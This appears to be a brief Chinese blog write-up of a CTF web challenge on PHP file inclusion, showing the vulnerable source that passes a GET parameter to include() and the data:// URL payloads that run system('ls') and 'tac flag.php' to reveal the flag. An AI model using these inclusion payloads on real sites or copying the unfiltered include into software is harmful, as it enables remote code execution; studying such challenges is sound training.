Web_php_include文件包含

 

开始访问页面

Web_php_include文件包含

发现已经给出了php源码

下面我们查查他有哪些文件

http://xxx/?page=data://text/plain,<?php system("ls")?>

Web_php_include文件包含

发现有三个文件

一眼就能够看出flag肯定是我们需要查看的文件

接着查看它

http://xxxx3:9998/?page=data://text/plain,<?php system("cat flag.php")?>

Web_php_include文件包含

发现该页面没有什么变化

尝试将cat命令换成tac

发现flag出来了

$flag="key2:5Fvcs07N";

Web_php_include文件包含

 

 

 

下面是源码

<?php

show_source(__FILE__);

echo $_GET[‘hello‘];

$page=$_GET[‘page‘];

//while (strstr($page, "php://")) {

// $page=str_replace("php://", "", $page);

//}

include($page);

?>

 

Web_php_include文件包含

上一篇:tomcat部署之后 本机访问本地部署的网站打开一个页面非常慢


下一篇:基于.NET的机械运动模拟应用开发